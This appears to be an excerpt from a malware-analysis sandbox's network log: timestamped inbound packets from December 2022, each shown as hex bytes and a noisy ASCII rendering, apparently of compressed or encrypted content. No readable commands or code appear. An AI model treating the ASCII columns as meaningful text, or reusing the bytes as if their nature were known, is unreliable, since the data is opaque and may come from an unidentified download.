                                                                                                                                                                          2022-12-05 14:13:35 UTC152INData Raw: 6d 38 1d 33 c4 7c 63 a8 f7 ae 74 61 39 3e 94 3d 93 f0 9b c5 81 5f cb 65 5d 97 bb fe 2d dc bf f2 b3 f1 7f f2 cb b9 27 9d b5 0c c7 61 dd 1b 47 fc 4b 61 27 38 a3 75 08 36 e9 c8 b2 d6 56 e5 05 6f 3c 28 11 69 00 57 ef 42 48 70 c0 74 19 4d 4a ca 25 54 85 47 ec af fb 16 ba e6 2a 8f be b4 2c 10 cf 9d db ac 00 27 e0 25 b5 c0 89 a6 1c 7d 39 9f 21 68 97 f7 0c 41 42 29 db 15 88 52 07 cb 89 39 c8 b0 2a a0 a3 a0 70 12 a0 ef 37 1a 1d 0e 27 48 8d 60 21 17 7b de 82 4f 49 2e 7f 7f 1c aa 17 27 9b 07 01 cb cc 79 47 33 48 e6 d9 58 12 c9 2a 2e 80 08 96 64 b7 62 fb ba 7b d9 84 07 49 80 a3 5e 64 c5 fb d1 19 bc 5c f1 e3 05 ac 95 36 6e f1 e5 a8 5c 2d c8 ca 8d 21 83 49 a5 8f bb 59 7d e1 b4 b7 2e bd 7f 8a ee 5c a9 14 25 6d c7 80 cb c9 1b 6b 27 f0 fc e3 76 98 c4 e1 20 bd db 69 8e 07
                                                                                                                                                                          Data Ascii: m83|cta9>=_e]-'aGKa'8u6Vo<(iWBHptMJ%TG*,'%}9!hAB)R9*p7'H`!{OI.'yG3HX*.db{I^d\6n\-!IY}.\%mk'v i
                                                                                                                                                                          2022-12-05 14:13:35 UTC153INData Raw: eb 21 ca c1 bd 48 55 9c 6f 47 e3 1c 3b dc aa 0a 89 f4 8a 56 8e e7 20 e8 26 d8 71 8d a2 e3 80 bf 20 e2 1a 92 e2 ad 86 bd f1 f2 ba 80 ea fd c4 f1 9b 87 59 43 e3 d1 2e 1d 56 26 a9 9b c5 03 5d 44 c2 ed de a8 fa 5f c9 ff ff da a6 a2 62 d1 b6 3e 07 97 6d a9 65 37 ac 10 ea 55 57 9d 9f 03 72 7b 6b ed f3 78 fd b6 0f f6 e3 9b f2 47 ad 71 7c 7c b7 15 8b e3 99 47 e3 24 c3 4c dc 3b c2 72 de 7a 12 1c ad f2 9a 4f d1 80 a7 ba a5 5d 72 bb 78 bf 30 1c 75 d6 fe 12 2c c9 13 a3 bf ef 95 7f ea cd 24 51 5a 86 45 1f d8 d5 47 2c 8c 83 62 87 b2 7e 86 2b a8 be 49 9c 74 74 51 a7 d4 ec fe 74 5c 9a 0b 66 ce a2 82 62 9b de 26 a3 64 69 a9 e2 59 c8 6f b7 e6 10 0b d1 48 a0 5c 4a c0 7d 67 34 f7 ca cb 80 54 5e 2b 5f 4e c4 93 d0 df 93 a7 b5 36 56 7b 60 c0 69 66 ea 13 c0 25 0f b6 5c dc a8 74
                                                                                                                                                                          Data Ascii: !HUoG;V &q YC.V&]D_b>me7UWr{kxGq||G$L;rzO]rx0u,$QZEG,b~+IttQt\fb&diYoH\J}g4T^+_N6V{`if%\t
                                                                                                                                                                          2022-12-05 14:13:35 UTC154INData Raw: 24 b9 97 b1 0c 98 18 94 db 35 af b6 30 ab 58 33 6d b4 f8 53 6d d0 ad 14 44 83 d0 87 7f e4 95 98 9b 7a 15 00 ba e4 8c 4b 28 e9 3b 44 17 47 2f 80 0a 6e eb 2c 8e 8d 37 f6 e8 8f 1d 9c a7 53 c9 8b 34 97 db 7e ce 14 a5 6a b4 23 a4 5d b6 5b b9 a8 2e c7 f6 4b 75 a8 f3 40 28 0b 61 99 8b f2 5f 6e 81 ff 02 c4 a1 84 82 34 47 9f 53 14 94 60 e3 31 78 ce 55 37 97 2d d7 de 76 bf 7f ff b7 93 27 8c 53 9c f6 cd 17 91 44 11 22 2f eb dd 23 63 aa c2 19 55 ff e0 84 2e 98 e1 b2 d4 16 04 37 85 fb 2a 6f 2d 71 e6 ae 88 01 5e c2 40 79 c1 f8 54 12 06 20 55 2a 52 51 e3 d4 5b 28 d0 aa 93 a8 19 df c7 92 2c 44 a1 31 95 0f 4c 80 38 5a 7e 39 44 a7 66 8d 79 8d a4 2e 3a 1c a4 6c 00 22 6e 70 50 28 78 2e 90 ab bd 9d 63 5c f0 30 e6 41 5e f6 ab c8 d0 3b 77 f7 c8 01 0d 7a f3 e0 94 91 30 dd db be
                                                                                                                                                                          Data Ascii: $50X3mSmDzK(;DG/n,7S4~j#][.Ku@(a_n4GS`1xU7-v'SD"/#cU.7*o-q^@yT U*RQ[(,D1L8Z~9Dfy.:l"npP(x.c\0A^;wz0
                                                                                                                                                                          2022-12-05 14:13:35 UTC155INData Raw: 4a 50 8d be c6 78 45 c0 ee 92 db e7 2c 1e 4f 10 1c 13 7f 9c b5 37 b8 cf b3 10 49 7b 4a 97 1d fc f2 91 04 24 5b f1 31 fe 6f 18 24 5d 52 86 c7 07 0b 82 5f 38 cc 54 ad c7 01 25 ce ca 48 fd 26 cf 60 65 8c 73 13 30 4c 7c a3 2f fa c8 1f 4b 3d c9 84 0c ee a7 da 79 cf 18 bb b2 ef 8a 5a d0 0a 53 93 94 68 27 8b 67 a7 19 1a b2 ad ad b4 b4 aa 6b 02 c0 06 05 19 8c 26 4f f3 05 ea d5 1f f3 22 82 2d 04 82 6a 7a f7 93 a2 29 f3 e3 51 38 5a ce 78 03 5d 2b 67 6f 4c e9 ad 3b 56 3c c4 72 2f ef 89 f1 1d ca 60 b2 b4 09 01 26 56 4c 85 33 69 92 d9 82 90 43 52 d4 8b 18 1b b4 9b b7 bf 52 50 85 a7 02 7c 34 2a b4 35 d6 15 88 1f d9 74 a0 7f 51 1a aa 61 c2 b5 d0 ff a0 d7 9d 56 6e 08 61 64 b5 58 72 ad 34 e4 06 90 b2 d6 dd 70 90 39 7e 7f 0c 5f 66 97 18 15 5e 2f 37 f5 77 8c b9 bc c7 7d 47
                                                                                                                                                                          Data Ascii: JPxE,O7I{J$[1o$]R_8T%H&`es0L|/K=yZSh'gk&O"-jz)Q8Zx]+goL;V<r/`&VL3iCRRP|4*5tQaVnadXr4p9~_f^/7w}G
                                                                                                                                                                          2022-12-05 14:13:35 UTC157INData Raw: 81 24 bf 81 b3 25 14 f0 40 c4 c3 3e 4d a9 df dc 70 9b a1 42 91 db 77 64 21 cc b7 74 1b 37 8d b7 ef 1a d7 ac 59 5a b0 9a 9b 1d cc f6 2e 0b af 4d 78 70 c2 ad 3a 44 00 ff 7d 9f b4 47 ed 9e 22 13 56 3a 46 d2 30 2e 69 1f eb c0 85 00 22 7c e0 3d f3 4a 20 9c e7 02 9a 77 57 f3 00 45 70 61 ce 22 bb 7c 79 2e a6 5e 13 15 af 57 03 2f 33 83 e9 be 1b 29 d6 04 94 5b 3b ff 39 af 0f 83 76 7e 1b 48 31 43 5e a0 7c f0 62 c5 ac a2 4a e1 19 41 72 45 42 59 42 e3 f7 22 2e 0f 2a 04 24 5f e4 9f bb 0d 67 8e e6 dd ae 37 43 b4 1c 5f 98 5a 70 e6 ef 7f ec 44 f1 48 35 f7 15 5d 75 d1 a4 d0 5a 8f cf 75 7a 78 04 ce 77 00 6a ef f5 19 c8 4c 0d af 34 ac 69 06 18 20 4f 11 a0 fb 9a df 1e af 91 b1 4a d0 6a ba 28 41 e8 1a 06 9d b8 14 16 c9 4a 60 40 1b 71 82 ef 52 b5 24 83 90 4f c3 4d 6d 4f c5 be
                                                                                                                                                                          Data Ascii: $%@>MpBwd!t7YZ.Mxp:D}G"V:F0.i"|=J wWEpa"|y.^W/3)[;9v~H1C^|bJArEBYB".*$_g7C_ZpDH5]uZuzxwjL4i OJj(AJ`@qR$OMmO
                                                                                                                                                                          2022-12-05 14:13:35 UTC158INData Raw: dc 4e 98 e3 d9 31 a4 87 27 0a 2b c8 4b d9 b0 77 f2 7e 1c 0b d2 c8 42 63 ac 18 c5 62 0d 21 f3 df 48 2b 3d b5 c6 b0 50 0e ba a7 1c 86 b2 ba 63 83 d2 13 61 64 27 48 bc c7 ed a0 e0 ec 10 2c 74 ee 44 cc d4 0d c4 6c f5 a1 40 09 ee 92 c3 54 9a ee 05 92 3a ff f7 7d 99 34 e9 91 dd 68 19 62 d9 94 08 75 3b e0 4e aa 0e e9 b1 91 ac 9b d2 26 6c d7 27 a6 4d d9 ee 91 74 5b 5b d7 25 b6 ec 1c 5e 04 ca cf d5 07 b9 79 97 72 70 67 56 d9 3c 28 74 8f d2 94 19 70 d9 a3 db e0 c3 80 6c 4a 0d ff ff 5f b8 f3 b4 6d 8f c7 31 fe 92 3b 6d ee bf 63 52 36 36 d3 83 92 a0 8d 24 07 86 59 e4 3b 67 a8 cf 3d 26 9f ad e8 53 1d 89 9d 17 3d 75 a6 cb 8b a6 5a 8f 72 98 47 44 50 b6 b7 0c 26 de 80 9e 31 6f 36 8e 5e c7 8a be f4 5e 24 f3 28 89 24 27 db de bb 66 29 c1 6f 63 bc 51 09 53 67 01 dd 7c 4e 42
                                                                                                                                                                          Data Ascii: N1'+Kw~Bcb!H+=Pcad'H,tDl@T:}4hbu;N&l'Mt[[%^yrpgV<(tplJ_m1;mcR66$Y;g=&S=uZrGDP&1o6^^$($'f)ocQSg|NB
                                                                                                                                                                          2022-12-05 14:13:35 UTC159INData Raw: fd ea 0c 47 8c 3a e3 43 31 f1 2f 07 5f 07 10 f6 7b cd 29 0c 92 df cb b6 25 fa 80 d5 74 8f fb 3a 4f c1 04 3e 08 73 cf 77 6e 33 2b 38 c2 5d a9 ef 56 87 28 98 04 08 ed e5 d1 67 19 32 c9 a1 49 ad 42 11 b9 0b 89 26 ad 56 72 90 31 59 2a 8d 46 11 3e 3d 87 53 f2 e8 3c 00 2a 93 92 5b a0 fb da c6 da 61 93 8b 36 b3 e8 dc 2d e6 64 8e e2 d0 41 0c 45 08 04 f4 d3 26 ae 38 30 51 24 23 18 99 5b 93 0c 72 56 56 ef 98 f9 25 ae c5 80 e3 35 05 37 fb 54 09 74 1b 87 c8 97 f6 97 2f c1 a2 7a 99 df 2d 1e d5 c9 4e 8b bc 90 72 ea 01 84 68 7d 35 a8 e1 53 86 05 a3 6b ba a3 a6 7c 3b 85 93 23 1f b2 60 b2 9f 83 9d b6 5a 73 fb 42 dc 46 b8 5e 5a c6 be 8b 5a d0 ac 93 75 c1 5f b1 ed 82 4a b9 81 d5 0d 55 81 20 a6 cd 36 60 56 56 95 14 f1 fd 3a 5e 43 42 11 dd 4f e1 28 ed b5 f0 91 8d ac b7 97 89
                                                                                                                                                                          Data Ascii: G:C1/_{)%t:O>swn3+8]V(g2IB&Vr1Y*F>=S<*[a6-dAE&80Q$#[rVV%57Tt/z-Nrh}5Sk|;#`ZsBF^ZZu_JU 6`VV:^CBO(
                                                                                                                                                                          2022-12-05 14:13:35 UTC160INData Raw: a6 3c 00 10 3e 79 69 0c 45 8b c5 69 3e 7d 23 f1 cc 6d b3 41 12 19 f1 69 2c fb d3 b6 c5 a1 d9 5e 34 53 56 7f c5 39 79 81 62 85 a3 a0 82 11 91 92 ef 86 42 61 ac 10 5c 1a 56 e1 ce 8c cb 3a 91 84 f9 38 b6 f6 86 02 79 c4 95 bb cf 51 d0 98 0e ba 37 6d ba 6a cb dc d2 d1 3b be b6 eb 4b 38 6a 9c 8c b4 06 28 25 03 d5 45 60 fb 2f 8f a5 ad 7c 71 af eb 51 19 1f 96 de 23 aa 57 e3 db 1a 88 45 b4 71 96 2c 78 3b 7e 7c bf 70 62 3c e3 37 51 af 62 d0 55 b0 04 98 22 75 17 84 dd 40 3f 51 08 77 95 a3 82 52 85 46 4b 3e 38 e8 66 9e de 81 38 b3 bd 79 1e 2a 5e 82 5f ef 73 27 c0 25 51 17 f9 8b 09 9c e3 21 84 8e 47 6f 16 c9 bd c7 82 1b cf 3e 34 61 f4 3d bc 8a 80 6c 01 50 66 02 f9 7d f3 20 c0 a4 e6 0a fd 08 cd 21 f9 c6 d8 c0 80 90 45 d7 86 12 af 0c 7d 05 27 9b a8 73 79 06 0b fe e0 3e
                                                                                                                                                                          Data Ascii: <>yiEi>}#mAi,^4SV9ybBa\V:8yQ7mj;K8j(%E`/|qQ#WEq,x;~|pb<7QbU"u@?QwRFK>8f8y*^_s'%Q!Go>4a=lPf} !E}'sy>
                                                                                                                                                                          2022-12-05 14:13:35 UTC162INData Raw: 1d ad 6b 4e 64 13 d8 26 88 82 6e 11 0c 83 63 2e 1c cc d8 48 22 23 f2 a9 e1 81 fe d2 eb d8 51 2f 20 a9 26 96 8c 11 b9 53 99 2b cd 7f fe 79 06 8d 84 dc 48 c7 73 63 3c f3 49 01 e7 f7 50 52 3b e0 db ac af 0c f9 45 80 44 dd 0a ba 1d b0 4b 2d ae ec b6 9c 54 69 75 db b1 f0 fe fa e1 a5 61 03 1f 66 f5 b6 3c 5f e6 96 e9 cf 2f a5 0b
                                                                                                                                                                          Data Ascii: kNd&nc.H"#Q/ &S+yHsc<IPR;EDK-Tiuaf<_/
                                                                                                                                                                          2022-12-05 14:13:35 UTC162INData Raw: 09 73 f4 48 2d 3e 3e 20 19 62 2c 43 5b b8 71 41 19 20 56 4d ca c4 4c 3d 23 da 0a e7 d2 50 d5 62 e5 63 c7 87 87 a0 b9 c6 3d 9d 9c df 07 7f f6 30 cf 7a 55 d8 4c 12 45 f9 2f 27 ee f5 15 04 80 fb a7 93 54 84 aa 58 df 21 d7 8d 45 a7 01 33 17 20 86 85 5c 42 ba 28 38 2b 24 b8 d6 63 f2 94 d9 56 a2 21 09 06 b9 79 60 ce 53 0f a4 8b 57 85 8a bb 89 f7 8c 65 a4 f7 f2 b6 36 df ad 60 79 ad 6d da 7b ad 44 ef ea 89 fc 49 a5 e4 44 eb 59 f3 69 d8 99 83 fc 8c 29 44 e6 de 15 32 f7 9e 2a 74 aa 64 4a 26 82 64 33 5c 82 48 6d fe c1 16 cc b8 90 8c e5 37 81 61 09 30 41 2c ae 53 fc 19 f3 62 d9 85 a0 d1 69 78 b5 59 bd 57 59 b5 0a e6 c0 4f 1e dc 77 82 0f db f5 f7 de 76 22 c5 74 63 a0 9b 21 00 c6 88 ef c9 cb 6f 91 7d 89 b9 79 e3 db b3 66 e3 94 49 df ed d5 13 e8 e6 fe 32 55 6e 03 2a e1
                                                                                                                                                                          Data Ascii: sH->> b,C[qA VML=#Pbc=0zULE/'TX!E3 \B(8+$cV!y`SWe6`ym{DIDYi)D2*tdJ&d3\Hm7a0A,SbixYWYOwv"tc!o}yfI2Un*
                                                                                                                                                                          2022-12-05 14:13:35 UTC163INData Raw: d9 fa dc 24 80 30 15 8a 8c 18 65 23 9c 20 ec ec b4 a2 a8 f9 3e 65 48 2a 98 86 63 df f7 fd c8 de 1f f4 c3 8a a0 52 e0 7a 92 a5 9a 10 4d 70 54 8f 35 08 d9 de 5e a7 ac 79 0d a2 c2 a4 b3 52 16 15 d5 86 aa 26 79 fb ae 8a c8 f1 39 93 1b 0f d2 a2 b9 55 70 0a e0 cc b0 19 a4 a1 12 40 a0 f6 6e b4 5e 41 0e 9d 4f 2a 80 fc 28 eb 87 f0 c1 e9 9e d7 bf 38 a2 d7 7c d8 26 b1 67 df f9 60 28 3e db 73 23 d7 1b b5 3f a9 40 e9 03 c7 3b 60 17 ae ff 82 e9 4e 71 ef 7d b1 d9 1d 96 9b 03 62 63 0d a4 2e 7c a3 83 41 40 9c 6e 15 e4 e7 e1 5d c8 3d 62 c1 e6 20 33 2f a4 68 af 7d 7f 19 1d 8b 77 01 74 60 e1 41 5e 01 1a c8 83 54 bf 84 41 21 70 85 4f 86 bf 33 bd 1e 7c b3 a1 42 22 e0 73 6b e9 5c c5 98 61 97 33 6b 2e 4a b4 68 86 18 7d 3c ea 56 30 fd cf 75 17 51 da 5d ee dc ce ab d6 62 4d 1b a8
                                                                                                                                                                          Data Ascii: $0e# >eH*cRzMpT5^yR&y9Up@n^AO*(8|&g`(>s#?@;`Nq}bc.|A@n]=b 3/h}wt`A^TA!pO3|B"sk\a3k.Jh}<V0uQ]bM
                                                                                                                                                                          2022-12-05 14:13:35 UTC164INData Raw: 33 09 c6 66 b9 43 2e 3f d7 15 05 b5 cd 64 27 09 0b 04 fa ba d1 bd 2c b6 49 aa ef f2 43 ea 96 32 05 71 26 c4 2e 0b 2c 56 86 20 ff d8 f1 b1 8f 30 09 1c 99 e7 24 a9 6d 5e 2b e9 cc 2f 24 e8 4f 4f ca 32 d1 6a 68 e4 7f 04 df c6 a8 93 16 37 4d 5f 23 ba eb 5e ca 4a 2d 33 ce 26 83 5e 21 6a c0 98 81 4e c0 fd 3e 8b 40 13 d3 0c 07 13 95 00 93 d9 25 3c 3f 55 9d 58 55 0a 10 05 91 c9 80 32 66 9e e0 d7 c7 b9 75 df b5 a3 f0 5e 26 a3 43 89 1f cf b4 ca 55 68 e1 22 23 a7 2e 01 0f 9e 9a c1 84 75 fc 6f cc b7 9e f3 61 da 84 40 62 a6 3c 83 56 1f 81 89 3c 09 a0 4b 4d d1 8e f2 23 3f b6 a4 16 a7 6a 9d 30 bf 9a 95 ff ae d9 fd 4b 62 c5 36 55 8a 9b 50 c1 9d da 46 30 ea ca 80 a3 8d 89 97 e2 96 32 6b 78 13 c5 81 ee 7a e1 97 37 20 a7 84 14 82 13 52 44 e6 00 4e 04 00 bb ac 82 57 34 5d 1f
                                                                                                                                                                          Data Ascii: 3fC.?d',IC2q&.,V 0$m^+/$OO2jh7M_#^J-3&^!jN>@%<?UXU2fu^&CUh"#.uoa@b<V<KM#?j0Kb6UPF02kxz7 RDNW4]
                                                                                                                                                                          2022-12-05 14:13:35 UTC165INData Raw: d7 42 91 7a a7 32 d2 46 fe 57 5c cc ae ed e9 3f 3c d3 cb 13 78 cd 24 20 31 a7 62 5e 21 b7 68 c3 cf 5d 76 ac 32 a6 3e 4a cc 37 55 4b 1e e0 48 1e 92 45 5c 91 c2 aa f8 76 4a 73 0d 14 db 7f bd 06 df d8 4c 07 5b 6a b6 f0 b6 89 9b a6 69 e5 f5 91 f5 75 e3 5f f3 bd e2 a0 6f 15 0d 8a f5 0f bb df 2b 0c a8 14 32 63 fa 8e 7c 71 fb 1b 96 8d e5 ca 0f 99 cf 2b e3 5e 57 18 bc 20 59 61 56 ea 2d fb 78 21 1d 5b 76 3d 83 38 c7 9c b7 8f 1f 3d 63 89 2a 4d c4 df 1c 05 7c f4 6a 20 4a 71 ca 4b 76 0a d2 6b a4 2e de 4f e0 be 4b d9 02 3a d4 83 85 39 5e 3d 74 a2 e6 ff ef 7a 89 36 3d de 16 4b e9 f4 6c db 18 bf 8c ce bd 1a 48 5a 37 2e f6 ca 18 94 c1 e8 58 74 f2 ea e6 6d fc 47 a2 0f 6e 80 58 57 b7 fa 59 34 43 6d 86 fd 45 9b 51 ca d0 2d 35 5d 2b b3 45 b0 df 35 68 0e ac 4f 69 61 28 e0 64
                                                                                                                                                                          Data Ascii: Bz2FW\?<x$ 1b^!h]v2>J7UKHE\vJsL[jiu_o+2c|q+^W YaV-x![v=8=c*M|j JqKvk.OK:9^=tz6=KlHZ7.XtmGnXWY4CmEQ-5]+E5hOia(d
                                                                                                                                                                          2022-12-05 14:13:35 UTC167INData Raw: fd 69 5d e2 4c 70 13 14 71 a3 3d ad 50 93 31 b5 10 1d 85 6d ac e0 bc c7 f3 bf 11 92 d9 cc 20 19 f9 4c a6 8f 1f c2 94 18 f7 f5 87 98 e6 fb 42 2a 1a bb 7e 41 93 71 03 9d 6a 28 14 57 5a a7 e2 c3 ac 72 b2 d5 c6 e8 83 19 59 ed 72 46 a8 e4 a1 71 33 7e d8 ee e8 9d da 3c 00 39 a2 e8 a9 39 82 5f 3a be 44 a7 29 09 f5 d6 36 a0 c6 24 5d e3 c3 a1 9a 67 0b de e5 5f df f0 7e db 7e 18 5e a2 a8 f6 1b a6 9f 28 54 ca 07 2f fc 63 4c f9 69 b0 cf 33 f1 79 5a ab 7c 14 be d9 19 8f 75 1b 13 ac 83 e9 4d 81 13 52 cb 3a f4 e7 f2 c6 dc 71 7b b4 4a 2c 70 1b dc 2f 02 08 d8 f6 75 68 38 5a 89 2a 80 f4 41 d6 a5 81 aa 4b 11 e3 3c 2c bf 24 02 cb 87 92 d2 f9 cc 58 d5 d9 42 56 bd cf e9 69 07 43 87 0c ce 0a d8 02 8b 63 ec 74 4f b8 55 cc db b9 14 88 5c f7 9e 6d b4 7b 99 5b 14 5b db 79 ab f0 c8
                                                                                                                                                                          Data Ascii: i]Lpq=P1m LB*~Aqj(WZrYrFq3~<99_:D)6$]g_~~^(T/cLi3yZ|uMR:q{J,p/uh8Z*AK<,$XBViCctOU\m{[[y
                                                                                                                                                                          2022-12-05 14:13:35 UTC168INData Raw: 5d 02 f5 aa c4 73 72 a0 0c a3 ad ee 84 fa da 55 eb 31 ef 54 8a a4 8e e7 ca f9 2b 25 25 b1 e2 e9 4c 37 ad 7a 0d 89 58 7c 2a 44 43 9e f4 9f ed 5a f3 99 a3 4b 06 c0 22 36 fe 39 59 aa 4b 82 6b e7 e5 32 f1 d1 9a 9b 58 8e af f1 62 ab 17 ea 2d bc cc fc 27 df 23 a7 19 f0 c4 b2 88 89 72 0c 10 91 d1 85 22 ff 4a f7 bc a1 96 66 b2 21 11 62 89 cc ad 6c 19 02 ea e1 1d 2b 7d d4 0d ab 4d f1 87 96 80 67 24 03 7f e8 dd 03 01 34 04 aa 1c a9 b1 11 2f f8 26 95 ca 3d b2 46 1c b2 c6 37 43 18 a8 5c 1f df a3 d0 ab c6 d5 dd 6f 19 ca 6b 6f cd 04 8b d8 e8 71 fb 30 1f 1e 03 29 de 4d 5d 5e b1 76 fe 5e c2 62 8e 97 85 a9 4f c0 ec 14 cf f0 ed cf b3 cd 69 aa fe f9 0a 1a de d8 19 93 1e f3 63 15 a6 e1 f6 0e 67 0a 56 7a 81 51 a7 d0 20 bf cc 4d c9 08 1c b3 3c 84 c5 e4 4c 18 3f 56 25 37 17 a7
                                                                                                                                                                          Data Ascii: ]srU1T+%%L7zX|*DCZK"69YKk2Xb-'#r"Jf!bl+}Mg$4/&=F7C\okoq0)M]^v^bOicgVzQ M<L?V%7
                                                                                                                                                                          2022-12-05 14:13:35 UTC169INData Raw: ec a9 c6 c1 65 c1 aa f1 2a e7 ee 44 df e3 01 bb 45 a1 a6 b5 87 42 e5 08 9e f2 8d 88 eb 09 98 d6 1d 05 0f 55 25 45 7e b4 80 59 eb f3 4f 75 90 14 df ca 2f 82 da 0e 4c 1a 2f 86 b6 2e b3 d3 a2 ab 48 f0 f4 8f 5f cb b9 03 66 36 96 7a 5a f0 7f cc e1 0c b1 94 55 f6 26 b2 6f bc 18 ed 08 5d d2 a9 66 36 f8 93 d2 e2 da a8 7b 2d a8 80 e9 51 74 79 a6 0f b0 26 d5 d3 22 16 b0 f2 58 a6 73 4b 61 c8 bc 8e 49 0b 83 8c 8a 7f 48 98 1e b4 3b 84 ba b8 90 53 e7 67 b9 e9 41 e8 88 f0 01 0d 3a f0 1d aa 35 a1 d7 3b 32 0d f5 a3 58 ee 8e d7 39 a9 fe 60 17 ba cf 14 e9 40 72 3c 84 39 cf 41 85 3a f6 73 57 87 35 32 c4 a4 81 e5 39 fb 73 77 61 77 9c c0 a8 3b 74 45 93 f4 6f a3 90 ef 00 12 b8 4f 7e d9 b9 ef 4a 14 90 4e 34 22 8f ec f7 41 fc 79 12 7a b3 ca 6a 0f 22 87 e2 5d 8e 1a db 4d 1a 90 bb
                                                                                                                                                                          Data Ascii: e*DEBU%E~YOu/L/.H_f6zZU&o]f6{-Qty&"XsKaIH;SgA:5;2X9`@r<9A:sW529swaw;tEoO~JN4"Ayzj"]M
                                                                                                                                                                          2022-12-05 14:13:35 UTC170INData Raw: df 38 ad e6 21 4c 6c 8c 00 d7 09 77 bd 3e df 6b ee 4f ee dc 1e b2 e8 2a 0f 7e 45 f6 34 36 69 15 9b 26 c3 80 9c b5 15 08 d7 6b da ef a4 80 67 29 c5 5d 01 d3 b4 5a 9d 14 86 52 15 31 09 98 3e 07 4d c0 f6 9c cc 54 61 c2 3b 72 47 70 10 35 6b d5 6e d1 1d ae 20 6c 0c 5a eb 47 7f 98 45 4c 16 4b 1d e7 01 ec 10 41 6e d1 16 52 36 98 3d ca 00 cd b2 32 4f ef 69 b2 53 a7 33 f6 c8 04 37 2d 55 b7 6c ba 43 8f ac bd a4 32 33 4f 17 45 cc 90 8f d3 ab 35 de 67 5f 51 1d f7 d3 53 a8 95 f0 5a 91 8b 20 8c e9 82 a5 47 62 e8 27 3e 7e aa dc f8 7b de d0 8c a1 5f fa 5a 57 7a ec e2 25 65 1d bd 33 8b 08 29 c7 66 56 bc ef cb 2a 74 87 69 f4 8d 59 27 86 f5 08 02 df 77 97 10 5c 62 cc b4 b2 47 6b b9 de b1 60 6b cc 65 bb 88 b3 ad bc b4 bd 4b 63 f4 3e c3 0b e7 dd 2e d7 b9 50 03 61 3e 9e 56 bc
                                                                                                                                                                          Data Ascii: 8!Llw>kO*~E46i&kg)]ZR1>MTa;rGp5kn lZGELKAnR6=2OiS37-UlC23OE5g_QSZ Gb'>~{_ZWz%e3)fV*tiY'w\bGk`keKc>.Pa>V
                                                                                                                                                                          2022-12-05 14:13:35 UTC171INData Raw: 56 ee 71 a2 9d 58 46 2e 00 37 e4 5f 9b 37 e8 79 5b cb 70 ba 47 9d 8c a4 d3 1f 2b b1 70 ec 3a f9 91 93 6b c4 e9 31 d7 72 4b 72 fe a4 dd bb 44 15 6b aa a0 51 89 92 2e 7d fc 00 9a 54 39 d4 46 e3 b7 7f 0e 70 4a 59 b9 0e fa 9b 34 30 49 47 f9 d1 64 cb 98 f7 3a 9e 99 27 aa 0e a3 5b 49 f7 f7 09 9d 0e 98 3f 92 42 2b a4 26 7c b2 75 82 0a 38 2a 25 96 46 2b 55 4d 52 69 5d a8 af f1 39 eb c2 4b fa d8 0d 5f f3 7d 81 4b d1 67 5c cd f9 19 fb a1 e5 29 9d 57 5a 4d 88 ee c8 a2 03 9a f2 6c 29 0a 9e 4a 8c 01 4b 83 8c 7e 3d 0a 43 56 e9 55 f5 5d fa 28 7a 86 21 22 da fa 51 54 a1 51 f9 39 a9 d5 39 19 3a 93 d1 46 15 a2 f3 36 96 a5 98 2a b1 b4 6f 77 8b 95 0b 36 dc e5 e0 fe 7f 5e 83 67 db 37 76 6a dc 1a 1f 44 13 76 79 12 a8 4a 06 28 ef 42 2a f7 f1 c8 b5 d9 1d 5e 68 e6 4b 8b 63 8c d6
                                                                                                                                                                          Data Ascii: VqXF.7_7y[pG+p:k1rKrDkQ.}T9FpJY40IGd:'[I?B+&|u8*%F+UMRi]9K_}Kg\)WZMl)JK~=CVU](z!"QTQ99:F6*ow6^g7vjDvyJ(B*^hKc
                                                                                                                                                                          2022-12-05 14:13:35 UTC173INData Raw: 4d 8e eb 84 ae 0d c7 fd 47 4f 03 68 96 35 6a d1 7b ef e6 7c 1e 37 61 e4 ce 09 e3 a1 ed 9e d8 3e bf 17 6d 59 62 f3 ed 66 d9 75 61 a7 41 c0 3a 47 74 12 4a fc cd 6f 4f 44 0e 14 74 56 32 00 5a 49 9a fe df 80 b0 9e 73 9c 7a 6e 5b 7d 45 86 14 de 0f 1b c6 6a 22 c8 bc ad 31 0d fc 2c fd 98 94 17 f4 18 82 5b d8 26 bf 8d 8e 9b fb 33 04 59 4d 5b d5 b6 91 32 7b a1 e1 50 da 43 fe 51 48 f1 66 a5 ee 2f 80 5d a2 04 36 ed ce 2e 13 1d e2 f9 45 cc 23 f6 c1 e8 3c 07 9a f0 63 88 c8 78 86 3c d4 5b 0f 08 22 74 09 53 6f 9c f4 43 91 ba 52 83 fd 6e 78 f1 dc 1c 24 7a c8 be c4 b8 05 ba 26 93 0e 9e dd 39 53 cf 43 15 7c 49 e9 a6 28 a4 1e e3 14 59 28 f8 8f 4b 61 5d 77 6f 03 f8 8b a5 44 bf e7 e7 72 ae 19 72 cd 2c 06 c6 5c fe 65 d7 8c a5 41 59 0b 07 10 8d 31 55 14 3d 7c 1d e1 de 9e de 1a
                                                                                                                                                                          Data Ascii: MGOh5j{|7a>mYbfuaA:GtJoODtV2ZIszn[}Ej"1,[&3YM[2{PCQHf/]6.E#<cx<["tSoCRnx$z&9SC|I(Y(Ka]woDrr,\eAY1U=|
                                                                                                                                                                          2022-12-05 14:13:35 UTC174INData Raw: 84 b9 23 c0 2e f1 34 3e 53 2b 0c cd 54 12 77 72 66 aa fd ae a0 4c b2 c0 33 d4 4f 32 b7 c0 3b b2 14 c3 c0 eb 0e 06 d8 2c f2 5d 42 b9 06 0f 55 c8 74 c0 ee 29 c6 51 2f 8e 3e 38 d8 97 29 e6 34 1f 4b 5e b4 5a 9e 74 61 3f 1a d9 38 a7 3d 4a df f9 d0 74 e4 54 6a f0 dd 32 00 cb 20 16 e5 8a 8b 1d fa 2d e8 0c a6 d9 38 96 40 d3 87 31 36 1d d2 30 96 f0 93 d0 66 15 af be f0 8e 4a 06 a5 c2 01 a7 83 7c 11 14 b6 07 af 3d 26 55 65 34 c7 e6 e5 8e a1 bb 1c e6 2b 5e a2 2d 66 a1 83 cf e5 88 2a d6 04 6a 68 d0 0e e3 77 41 7b 7a 0f dc 65 f5 82 85 87 82 ef ac ff 93 4a 7a 73 a7 d8 97 66 db 25 52 61 f6 1a 31 03 54 a5 8a 83 d6 36 72 9e 4e 11 46 4c a2 16 0e a2 82 06 69 bc 30 e5 af cb b6 ca 06 bc 2f 61 fd 8e 65 19 b5 cc 87 22 b7 49 b9 82 02 38 de 96 44 e8 1b 26 4b 94 fe 41 09 78 21 85
